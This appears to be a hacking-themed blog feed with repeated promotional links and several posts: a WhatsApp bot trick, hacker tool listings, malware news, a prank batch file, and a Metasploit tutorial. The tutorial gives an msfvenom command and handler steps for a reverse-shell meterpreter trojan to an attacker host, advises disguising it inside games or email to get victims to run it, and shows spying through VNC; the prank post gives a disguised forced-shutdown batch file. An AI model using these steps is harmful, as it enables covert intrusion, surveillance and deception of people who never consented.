Don't wanna be here? Send us removal request.
Video
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Video
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Video
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Text
HOW TO USE WHATS APP AS SEARCH ENGINE
Hello and welcome everyone to hackingethical, In today’s tutorial we will be discussing on “How To use Whats App as Search Engine”, Yes you heard it, After following this tutorial you can directly search anything from your Whats App messenger and not only this it also supports wiki and dictionary.
Advantages of This Trick:
1. Search Any Topic 2. Get Wikipedia Results 3. Get Live Train Status 4. Get PNR Status 5. Get daily News updates 6. Play GK quiz & Lots more
Basically, in today’s tutorial, we are going to use whats app bot. The tutorial is very easy anyone who has a basic knowledge about WhatsApp can to this trick easily. Do ask your queries in the comment box and we will try to solve it asap.
Downloads & Requirements??
Android or Ios Device (with active internet connection) Latest Whats App Application
Step 1: Add a Whats App Bot Contact on your device according to the details below:
Name: hackingethical Number: +91-7397682861
Step 2: Now you will have to create a new Whats App group and for doing so all have to do is just open Whats App messenger, then tap on the three dot menu and then Tap on “NEW GROUP”.
Step 3: Now Add the Contact “hackingethical” on that group. Now name the group as “hackingethical”(You can give any name), Now open the group and then in the search part write the things written below:
For Searching any Topic write “Search (Topic)” and send e.g Search Google
For Searching Any Topic in Wikipedia write “Wiki (Topic)” and send e.g wiki Android
For meaning of a Word write “Dict (word)” and send e.g Dict Technology
To get live Train Status, write “Train train no” and send e.g Train 12321
To get Train PNR status, write “PNR (PNR number)” and send e.g PNR 1234567890
I hope you liked our article for more Tech related stuff, Do visit hackingethical daily.
Disclaimer: Every Tutorial in hackingethical is for Informational and Educational Purpose, hackingethical and authors of the tutorials posted are not responsible for any loss.
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U

0 notes
Text
How to hack windows using kali linux remotely with metasploit – 2017
Router Configuration
This step is very important when your target is over the internet or WAN. Ignore this step if your target is on same LAN. To hack a pc over the internet means you have to communicate in both direction. To do this, your router/modem should open a port of your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser go to url http://192.168.1.1 Type in your username and password (by default password and username will be “admin“). This will take you to the router settings. Go to Advanced settings find port forwarding. Now click on add new set the start and end port to 444 (since we are using port 444 on metasploit). In the Ip address field you must type in your linux machine’s internal ip. Save settings. you are done. You can double check by scanning your port with online port scanners.
Generate the Trojan
Generate the payload using msfvenom. set the port to 444 and ip to your public IP or local IP depending on your target.The generated trojan will try to connect to This IP and port when its executed. following command will generate the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe
A trojan will be generated in the desktop. keep it aside and move on to handler section. fire up metasploit and follow the steps.
# msfconsole
Wait for a minute, msfconsole will come up. Use handler then, set payload and port.
1. Handler
msf> use multi/handler
2. set payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
3. Set local port
msf exploit(handler) > set LPORT 444
4. Set local host
msf exploit(handler) > set LHOST “attacker ip”
5. exploit
msf exploit(handler) > exploit Wait for the target to connect back
msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.104:444 [*] Starting the payload handler…
Execute the payload
Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned. [*] Started reverse handler on 192.168.1.104:444 [*] Starting the payload handler… [*] Sending stage (83170 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500 meterpreter >
Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more. use help command to see the whole list of commands
meterpreter > help
Use this command to run vnc session and spy the target
meterpreter > run vnc
This whole process is simple but, the toughest part is getting the trojan in to the target user. Attaching the file along with games works great.

0 notes
Text
RED HAWK: All In One Tool For Information Gathering, SQL Vulnerability Scanning And Crawling
Features Of The Tool:
Server detection Cloudflare detector robots scanner CMS Detector WordPress Joomla Drupal Magento Whois GEO-IP Scan NMAP Port Scan DNS Lookup SubNet Calculator Subdomain Finder Reverse IP Scanner CMS detection For Sites On the same server. Parameter Finder Error based SQLi Detector Crawler Basic Crawler {69} [ - ] Admin scanner [ - ] Backups Finder [ - ] Misc. Crawler Advance Crawler{420} [ - ] Admin scanner [ - ] Backups Finder [ - ] Misc. Crawler
Installation:
Run The Tool and Type fix This will Install All Required Modules.
Usage:
git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK php rhawk.php Use the "help" command to see the command list or type in the domain name you want to scan (without Http:// OR Https://). Select whether The Site Runs On HTTPS or not. Leave The Rest To The Scanner
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
#hacking#ethical hacking#hacking ethical#android hacking#wifi hacking#red hawk#seo tools#linux tools
0 notes
Text
Welcome to our Hacker Tools list of 2017…
Also….remember! All these tools come bundled in pentesting Linux distro’s such as Kali Linux or BackBox, so we’d certainly recommend that you install an appropriate Linux hacking box to make your life easier – not least because repositories are (automatically) updated.
1.Nmap (Network Mapper) | Free
Used to Scan Ports and Map Networks - and a whole bunch more!
Nmap is an abbreviation of 'Network Mapper', and it's very well known free open source hackers tool. Nmap is mainly used for network discovery and security auditing. Literally, thousands of system admins all around the world will use nmap for network inventory, check for open ports, manage service upgrade schedules, and monitor host or service uptime. Nmap, as a tool uses raw IP packets in creative ways to determine what hosts are available on the network, what services (application name and version) those hosts are providing information about, what operating systems (fingerprinting) and what type and version of packet filters/ firewalls are being used by the target. There are dozens of benefits of using nmap, one of which is that fact that the admin user is able to determine whether the network (and associated nodes) need patching. Nmap's been featured in literally every hacker movie out there, not least the recent Mr. Robot series. It's also worth mentioning that there's a GUI version of Nmap called 'Zenmap'. We'd advise you to learn using Nmap (i.e. the 'command line') then rotate into Zenmap when you are feeling all confident.
Download Link ===>>>https://goo.gl/FqTu83
2.Metasploit Penetration Testing Software | Free & Paid
Vulnerability Exploitation Tool
The Metasploit Project is a hugely popular pentesting or hacking framework. If you are new to Metasploit think of it as a 'collection of hacking tools and frameworks' that can be used to execute various tasks. Widely used by cybersecurity professionals and ethical hackers this is a tool that you have to learn. Metasploit is essentially a computer security project (framework) that provides the user with vital information regarding known security vulnerabilities and helps to formulate penetration testing and IDS testing plans, strategies and methodologies for exploitation. There's a ton of incredibly useful Metasploit information out there and we hope that the books that we've chosen go someway to help you on your journey, not least if you are a beginner just starting out and looking for beginners tutorials in how to use Metasploit.
Download Link ===>>>https://goo.gl/65ktba
3.John The Ripper | Free
Password Cracking Tool
John the Ripper (often you'll see abbreviated as 'JTR') wins the award for having the coolest name. John the Ripper, mostly just referred to as simply, 'John' is a popular password cracking pentesting tool that is most commonly used to perform dictionary attacks. John the Ripper takes text string samples (from a text file, referred to as a 'wordlist', containing popular and complex words found in a dictionary or real passwords cracked before), encrypting it in the same way as the password being cracked (including both the encryption algorithm and key), and comparing the output to the encrypted string. This tool can also be used to perform a variety of alterations to dictionary attacks. If you are somewhat confused between John the Ripper and THC Hydra then think of John the Ripper as an 'offline' password cracker whilst THC Hydra is an "online" cracker.
Download Link ===>>>https://goo.gl/NtY6xb
4.THC Hydra | Free
Password Cracking Tool
We've purposely placed THC Hydra underneath John The Ripper because they often go 'hand-in'hand'. THC Hydra (we've abbreviated to simply 'Hydra' throughout our site) is a hugely popular password cracker and has a very active and experienced development team. Essentially THC Hydra is a fast and stable Network Login Hacking Tool that will use dictionary or brute-force attacks to try various password and login combinations against an log in page. This hacking tool supports a wide set of protocols including Mail (POP3, IMAP, etc.), Databases, LDAP, SMB, VNC, and SSH. Take a look at John the Ripper as well.
Download Link ===>>>https://goo.gl/fD2Ric 5.OWASP Zed | Free
Web Vulnerability Scanner
The Zed Attack Proxy (ZAP) is now one of the most popular OWASP projects. The fact that you've reached this page means that you are likely already a relatively seasoned cybersecurity professional so it's highly likely that you are very familiar with OWASP, not least the OWASP Top Ten Threats listing which is considered as being the 'guide-book' of web application security. This hacking and pentesting tool is a very efficient as well as being an 'easy to use' program that finds vulnerabilities in web applications. ZAP is a popular tool because it does have a lot of support and the OWASP community is really an excellent resource for those that work within Cyber Security. ZAP provides automated scanners as well as various tools that allow you the cyber pro to discover security vulnerabilities manually. Understanding and being able to master this tool would also be advantageous to your career as a penetration tester. If you are a developer then you have it's obviously highly recommended that you learn how to become very proficient with this 'hacker tool!'
Download Link ===>>>https://goo.gl/RDUchN
6.Wireshark | Free
Web Vulnerability Scanners
Wireshark is a very popular pentesting tool and for over a year it was not included on our list, however, by popular demand we added it in late June 2016. Wireshark essentially captures data packets in a network in real time and then displays the data in human-readable format (verbose). The tool (platform) has been highly developed and it includes filters, color-coding and other features that lets the user dig deep into network traffic and inspect individual packets. If you'd like to become a penetration tester or work as a Cyber Security practioner, then learning how to use Wireshark is a must. There are a ton of resources out there to learn Wireshark, and, of particular interest, there's also a Wireshark Certification which you can achieve and place on your LinkedIn profile.
Download Link ===>>>https://goo.gl/j1jkLW
7.Aircrack-ng | Free
Password Cracking Tool
The Aircrack suite of Wifi (Wireless) hacking tools are legendary because they are very effectively when used in the right hands. For those new to this wireless-specific hacking program, Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking hacking tool that can recover keys when sufficient data packets have been captured (in monitor mode). For those tasked with penetrating and auditing wireless networks Aircrack-ng will become your best friend. It's useful to know that Aircrack-ng implements standard FMS attacks along with some optimizations like KoreK attacks, as well as the PTW attacks to make their attacks more potent. If you are a mediocre hacker then youll be able to crack WEP in a few minutes and you ought to be pretty proficient at being able to crack WPA/ WPA2. For those interested in Wireless Hacking we'd also highly recommend taking a look at the very awesome Reaver, another very popular hacking tool that alas we couldn't add to our list.
Download Link ===>>>https://goo.gl/itByaz
8.Maltego | Free & Paid
Digital Forensics
Maltego is different in that it works within a digital forensics sphere. Maltego is a platform that was designed to deliver an overall cyber threat picture to the enterprise or local environment in which an organization operates. One of the awesome things about Maltego which likely makes it so popular (and included in the Kali Linux Top Ten) is its's unique perspective in offering both network and resource based entities is the aggregation of information sourced throughout the web - whether it's the current configuration of a vulnerable router within a network or the current whereabouts of your staff members on their international visits, Maltego can locate, aggregate and visualize this data! For those interested in learning how to use Maltego we'd also recommend learning about OSINT cybersecurity data procurement.
Download LInk ===>>>https://goo.gl/7PxPMg
9.Cain and Abel Hacking Tool | Free
Password Cracker/ Password Hacking
Cain and Abel (often simply abbreviated to Cain) is a hugely popular hacking tool and one that is very often mentioned online in a variety of 'hacking tutorials'. At its' heart, Cain and Abel is a password recovery tool for Microsoft Windows but it can be used off-label in a variety of uses, for example, white and black hat hackers use Cain to recover (i.e. 'crack') many types of passwords using methods such as network packet sniffing and by using the tool to crack password hashes. Cain, for example, when used to crack password hashes would use methods such as dictionary attacks, brute force, rainbow table attacks and cryptanalysis attacks.
Download LInk ===>>>https://goo.gl/zPXHLd
10.Nikto Website Vulnerability Scanner | Free
Website Vulnerability Scanner Hacking Tool
Nikto is another classic 'Hacking Tool' that a lot of pentesters like to use. Worth mentioning that Nickto is sponsored by Netsparker (which is yet another Hacking Tool that we have also listed in our directory). Nikto is an Open Source (GPL) web server scanner which is able to scan and detect web servers for vulnerabilities. The system searches against a database of over 6800 potentially dangerous files/ programs when scanning software stacks. Nikto, like other scanners out there, also scans for outdated (unpatched) versions of over 1300 servers, and version specific problems on over 275 servers. Interestingly, Nikto can also check server configuration items such as the presence of multiple index files, HTTP server options, and the platform will also try to identify installed web servers and web applications. Nikto will get picked up by any semi-decent IDS tool so its' really useful when conducting a white-hat/ white-box pentest. Certainly a great tool to learn your skills on when attacking an open box for training.
Download LInk ===>>>https://goo.gl/611vH6
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U

0 notes
Text
HOW TO MAKE A FAKE AND HARMLESS VIRUS FOR PRANK
Hello and welcome everyone to Hacking Ethical. In today’s tutorial we are going to discuss on how to make a fake and harmless virus for prank. After applying this simple trick you can easily create a fake virus and prank your friends. Don’t worry it will not harm your friend’s computer.
The tutorial is very easy and noob friendly anyone who has a basic computer knowledge can do this trick very easily, Do ask your queries in the comment box and we will try to solve it asap. Comments and suggestions are always welcomed.
Things You Need??
Laptop/ PC A little bit patience
Step 1: Open notepad and copy paste the following things written below
@echo off echo Message here. shutdown -s -f -t 60 -c “Virus Attacking Procedure 100%…Complete”
Step 2: Now Save as the File with the name Free internet.bat and Choose the Save As Type as “All Files” and close the Notepad window.
Step 3: Now right-click on the desktop and click on Shortcut. For Shortcut location, Choose the free internet.bat File and click finish.
Step 4: Now right Click on the shortcut you have just made and choose “Properties” and then “Change icon” and choose any icon and hit ok two times.
Whenever your friend will open the file it will automatically Turn Off the PC/Laptop with a message “Virus Attacking Procedure 100%…Complete”
I hope you liked our article for more Tech related stuff do visit Hacking Ethical daily.
Disclaimer: Every Tutorial in Hacking Ethical is for Informational and Educational Purpose, Hacking Ethical and authors of the tutorials posted are not responsible for any loss.
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Text
How To Hide Secret Files Inside Calculator On Android
welcome everyone to Hacking Ethical in today’s tutorial we are going to discuss on how to hide secret files inside calculator on android. Yes, you heard totally right after applying this simple trick you can easily hide your private files on Android.
The tutorial is super easy anyone who has a basic android knowledge can do this trick easily, Do ask your queries in the comment box and we will try to solve it asap. Comments and Suggestions are always welcomed.
So Without any further Do, let’s get started…
Things You Need?? 1. Android Device 2. Smart Hide Calculator App
Step 1: Download, Install and Open Smart Hide Calculator App Link ====>>>https://goo.gl/ejwBeL Step 2: Now the application will ask you to set a passcode. Set your desired passcode. Step 3: After setting up the passcode. Now you will get an option like this shown below. All you have to do is select the option ” Hide Files ” and then choose the desired files that you want to hide. For unhiding, all you have to do is tap on “UnHide Files” option and then tap on the three dot menu located in the upper right and then tap on Unhide All. That’s it.
Note: 1. The secret screen’s UI(the one with hide and unhide buttons) may look a little weird on small screen sizes. Note: 2. In case the user forgets the password he/she can recover it by going into password recovery mode(by pressing 123456789+987654321 in the calculator) and providing the secondary password. Note 3: If you want to open the vault (Private) section, you just need to enter the password in the calculator screen and then press the ‘=’ button.
I hope you liked our article for more Tech related stuff do visit hacking ethical Daily.
Disclaimer: Every Tutorial in Hackingethical is for Informational and Educational Purpose, Hackingethical and authors of the tutorials posted are not responsible for any loss.
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U

0 notes
Photo
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Text
WikiLeaks Reveals CIA Tool Acting as SMS Proxy on Android
WikiLeaks has revealed details about HighRise, a tool allegedly developed by the US Central Intelligence Agency (CIA), which intercepts and redirects SMS messages to a remote web server through an Android application.
In other words, the malware can enable a CIA agent to access the message before it reaches its intended recipient.
The leaked manual comes from Vault 7, the codename given by WikiLeaks to documents it claims reveal a repertoire of hacking tools and capabilities that the CIA has used in the recent past.
According to WikiLeaks, HighRise acts as a proxy server for text messages. However, it is limited to devices which have the malware installed on it manually – meaning that the CIA would need physical access to the Android device to infect the handset.
The manual suggested that it only works on Android versions from 4.0 (Ice Cream Sandwich) to 4.3 (JellyBean) – although it could have been updated to work on more recent versions of the Android OS.
The HighRise tool is packaged inside an app called TideCheck. Once the CIA installs the app on the target’s device, they have to run it at least once, in order for it to work at all times – including when the phone is rebooted. The app starts when the phone is powered on, meaning that it can continue to run in the background and intercept text messages for longer than most other CIA malware, which disappeared after a restart.
According to the manual, CIA operatives have to enter the special code ‘inshallah’ which is the Arabic word for ‘God willing’ to access the app’s settings.
Once activated, the app gives the user three choices – they can return directly to the configuration to make changes, they can start the tool or they can send an SMS from the phone to a remote CIA server.
This is the first Vault 7 data dump to involve the Android OS; most of the other tools have been focused on Windows or Linux. This included Grasshopper, a builder for Windows malware, and Scribble, a beaconing system for Office documents. There has also been a tool geared to hack Samsung smart TVs, and a tool for hacking iPhones and Macs.
WikiLeaks claim that the CIA are, or have been using many of these tools- but critics suggest that the documents are several years out-of-date and have suggested that WikiLeaks has overhyped their importance.

0 notes
Text
WARNING! This Android Malware Steals Data From Facebook & WhatsApp
Security has become a major concern for users, not just for computers, but also mobile for the phones. Do not forget that ransomware WannaCry as this severe and dangerous ransomware also attacked Android phones, and experts warn that you may have some virus on your mobile and you do not know yet.
Now, a team of computer security researchers from the firm Palo Alto Networks has launched a new alert: a new malware for Android has been identified that has the ability to steal data from more than 40 applications, including the social media giant’s application Facebook and the most widely used and popular instant messaging application WhatsApp, as well Such as the positioning of devices. The virus has been called SpyDealer and it is an Android Trojan that could be operating since October 2015.
According to the report of these researchers, they have found 1,046 different samples of this Trojan. Malware, although still in development, stands out for being very powerful and having many malicious functions.
On the other hand, it can steal data from more than 40 apps installed on the device, such as Facebook, WhatsApp, Telegram, Skype, browsers, mail apps, etc. Therefore, this severe threat can easily obtain necessary confidential information from victims without their knowledge.
To perform these actions, SpyDealer simply obtains administrator permissions to keep the device compromised and employs Android accessibility services for malicious purposes. Hold on, not only that, even it is also capable of taking clandestine screenshots, record phone calls and microsounds, monitor the location or even remotely control the device through UDP, TCP and SMS channels.
From Palo Alto Networks they point out that fortunately the malware has not been distributed through Google Play, and believe that it will be spreading through compromised wireless networks. The team has notified the Mountain View company, of course, the tech giant Google of the problem, which has already created protections against SpyDealer through Google Play Protect.
So, what do you think about this dangerous virus? Simply share your views and thoughts in the comment section below.
0 notes
Photo
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe us for more videos on youtube
https://goo.gl/J6mj7U
0 notes
Link
Like us on facebook :-
https://goo.gl/5VrVUt -------------------------------------------------------------------------------- Download Our Android App https://goo.gl/gfNcWL -------------------------------------------------------------------------------- subscribe for more videos
0 notes
Photo
0 notes